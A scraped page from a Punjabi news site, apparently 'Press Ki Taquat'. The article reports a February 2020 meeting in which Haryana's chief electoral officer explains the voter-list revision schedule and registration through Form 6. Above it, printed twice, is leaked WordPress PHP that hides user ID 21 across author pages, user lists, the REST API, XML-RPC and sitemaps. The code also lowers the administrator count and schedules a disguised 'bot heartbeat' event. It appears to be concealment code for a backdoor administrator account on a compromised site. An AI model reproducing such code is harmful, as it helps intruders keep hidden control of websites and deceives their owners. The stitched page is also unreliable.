add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਹਰਿਆਣਾ ਦੇ ਮੁੱਖ ਚੋਣ ਅਧਿਕਾਰੀ ਨੇ ਸਿਆਸੀ ਪਾਰਟੀਆਂ ਦੇ ਨੁਮਾਇੰਦਿਆਂ ਨਾਲ ਮੀਟਿੰਗ ਕੀਤੀ - Press Ki Taquat
No Result
View All Result
ਚੰਡੀਗੜ, 14 ਫਰਵਰੀ (ਵਰਸ਼ਾ ਵਰਮਾ) – ਹਰਿਆਣਾ ਦੇ ਮੁੱਖ ਚੋਣ ਅਧਿਕਾਰੀ ਅਨੁਰਾਗ ਅਗਰਵਾਲ ਨੇ ਕਿਹਾ ਕਿ ਅਜੇ ਤਕ ਜਿਸ ਨਾਗਰਿਕ ਦਾ ਵੋਟ ਨਹੀਂ ਬਣਿਆ ਹੈ ਅਤੇ ਉਹ 1 ਜਨਵਰੀ, 2020 ਨੂੰ 18 ਸਾਲ ਜਾਂ ਇਸ ਤੋਂ ਵੱਧ ਉਮਰ ਦਾ ਹੋ ਗਿਆ ਹੈ ਤਾਂ ਉਹ ਜਲਦ ਤੋਂ ਜਲਦ ਆਪਣਾ ਵੋਟ ਬਣਾ ਕੇ ਲੋਕਤੰਤਰ ਵਿਚ ਆਪਣੀ ਹਿੱਸੇਦਾਰੀ ਯਕੀਨੀ ਕਰੇ|
ਮੁੱਖ ਚੋਣ ਅਧਿਕਾਰੀ ਰਾਜ ਦੇ ਸਿਆਸੀ ਪਾਰਟੀਆਂ ਦੇ ਨੁਮਾਇੰਦਿਆਂ ਨਾਲ ਮੀਟਿੰਗ ਦੀ ਪ੍ਰਧਾਨਗੀ ਕਰ ਰਹੇ ਸਨ| ਮੀਟਿੰਗ ਵਿਚ ਸਾਰੇ ਸਿਆਸੀ ਪਾਰਟੀਆਂ ਦੇ ਨੁਮਾਇੰਦਿਆਂ ਤੋਂ ਵੋਟ ਕੇਂਦਰਾਂ ‘ਤੇ ਬੂਥ ਲੇਵਲ ਏਜੰਟ ਨਿਯੁਕਤ ਕਰਨ ਦੀ ਅਪੀਲ ਕੀਤੀ ਗਈ ਤਾਂ ਜੋ ਵੋਟਰ ਸੂਚੀਆਂ ਨੂੰ ਗਲਤੀ ਰਹਿਤ ਤਿਆਰ ਕੀਤੀ ਜਾ ਰਹੀ ਹੈ|
ਮੁੱਖ ਚੋਣ ਅਧਿਕਾਰੀ ਨੇ ਸਿਆਸੀ ਪਾਰਟੀਆਂ ਦੇ ਨੁਮਾਇੰਦਿਆਂ ਨੂੰ ਦਸਿਆ ਕਿ 1 ਜਨਵਰੀ, 2020 ਨੂੰ ਕੁਆਲੀਫਾਇੰਗ ਮਿਤੀ ਮੰਨਦੇ ਹੋਏ ਵੋਟਰ ਸੂਚੀਆਂ ਦਾ ਵਿਸ਼ੇਸ਼ ਮੁੜਨਿਰੀਖਣ ਮੁਹਿੰਮ ਦਾ ਪ੍ਰੋਗ੍ਰਾਮ ਸੋਧ ਕੀਤਾ ਗਿਆ ਹੈ| ਨਵੇਂ ਪ੍ਰੋਗ੍ਰਾਮ ਅਨੁਸਾਰ, ਏਕਿਕ੍ਰਿਤ ਵੋਟਰ ਸੂਚੀਆਂ ਦਾ ਖਰੜਾ ਛਪਾਈ 10 ਫਰਵਰੀ, 2020 ਨੂੰ ਕੀਤਾ ਜਾ ਚੁੱਕਿਆ ਹੈ| 10 ਫਰਵਰੀ ਤੋਂ 12 ਮਾਰਚ, 2020 ਤਕ ਦਾਅਵੇ ਤੇ ਇਤਰਾਜ ਪ੍ਰਾਪਤ ਕੀਤੇ ਗਏ ਹਨ| ਉਨਾਂ ਕਿਹਾ ਕਿ 15 ਫਰਵਰੀ, 16 ਫਰਵਰੀ, 29 ਫਰਵਰੀ ਅਤੇ 1 ਮਾਰਚ, 2020 ਨੂੰ ਵਿਸ਼ੇਸ਼ ਮੁਹਿੰਮ ਆਯੋਜਿਤ ਕੀਤੀ ਜਾਵੇਗੀ| ਪ੍ਰਾਪਤ ਦਾਅਵੇ ਤੇ ਇਤਰਾਜਾਂ ਦਾ ਨਿਪਟਾਰਾ 24 ਮਾਰਚ, 2020 ਤਕ ਕੀਤਾ ਜਾਵੇਗਾ ਅਤੇ ਵੋਟਰ ਸੂਚੀਆਂ ਦੀ ਆਖਰੀ ਛਪਾਈ 30 ਅਪ੍ਰੈਲ, 2020 ਨੂੰ ਕੀਤੀ ਜਾਵੇਗੀ| ਉਨਾਂ ਦਸਿਆ ਕਿ 15 ਫਰਵਰੀ, 16 ਫਰਵਰੀ, 29 ਫਰਵਰੀ ਅਤੇ 1 ਮਾਰਚ, 2020 ਨੂੰ ਆਯੋਜਿਤ ਹੋਣ ਵਾਲੇ ਵਿਸ਼ੇਸ਼ ਮੁਹਿੰਮ ਦੇ ਦਿਨਾਂ ‘ਤੇ ਬੀਐਲਓ ਆਪਣੇ-ਆਪਣੇ ਬੂਥਾਂ ‘ਤੇ ਰਹਿਣਗੇ|
ਸ੍ਰੀ ਅਨੁਰਾਗ ਅਗਰਵਾਲ ਨੇ ਦਸਿਆ ਕਿ ਵਿਧਾਨ ਸਭਾ ਆਮ ਚੋਣ, 2019 ਤੋਂ ਬਾਅਦ ਫੋਟੋ ਵਾਲੀ ਵੋਟਰ ਸੂਚੀਆਂ ਦੇ ਵਿਸ਼ੇਸ਼ ਸੰਖੇਪ ਮੁੜਨਿਰੀਖਣ ਮੁਹਿੰਮ ਤੋਂ ਬਾਅਦ ਛਪੀ ਖਰੜਾ ਰੋਲ ਦੀ ਵੋਟਰ ਸੂਚੀ ਦੀ ਕਾਪੀ ਸਾਰੇ ਸਿਆਸੀ ਪਾਰਟੀਆਂ ਦੇ ਨੁਮਾਇਦਿਆਂ ਨੂੰ ਦੇ ਦਿੱਤੀ ਗਈ ਹੈ| ਉਨਾਂ ਦਸਿਆ ਕਿ ਵੋਟਰਾਂ ਦੇ ਨਾਂਅ ਜੋੜਣ ਅਤੇ ਕੱਟਣ ਦੀ ਪ੍ਰਕ੍ਰਿਆ ਬੂਥ ਲੇਵਲ ਅਧਿਕਾਰੀ ਵੱਲੋਂ ਘਰ-ਘਰ ਜਾ ਕੇ ਤਸਦੀਕ ਕਰਨ ਤੋਂ ਬਾਅਦ ਕੀਤੀ ਗਈ ਹੈ|
ਇਸ ਲਈ ਪਾਤਰ ਵਿਅਕਤੀ ਸਬੰਧਤੀ ਬੀਐਲਓ, ਚੋਣ ਰਜਿਸਟਰੇਸ਼ਨ ਅਧਿਕਾਰੀ, ਸਹਾਇਕ ਚੋਣ ਰਜਿਸਟਰੇਸ਼ਨ ਅਧਿਕਾਰੀ ਕੋਲ ਫਾਰਮ 6 ਭਰ ਕੇ ਵੋਟ ਬਣਾ ਸਕਦੇ ਹਨ| ਇਹ ਫਾਰਮ ਚੋਣ ਵਿਭਾਗ ਦੀ ਵੈਬਸਾਇਟ www.ceoharyana.gov.in ‘ਤੇ ਵੀ ਉਪਲੱਬਧ ਹੈ|
Post Views: 326
No Result
View All Result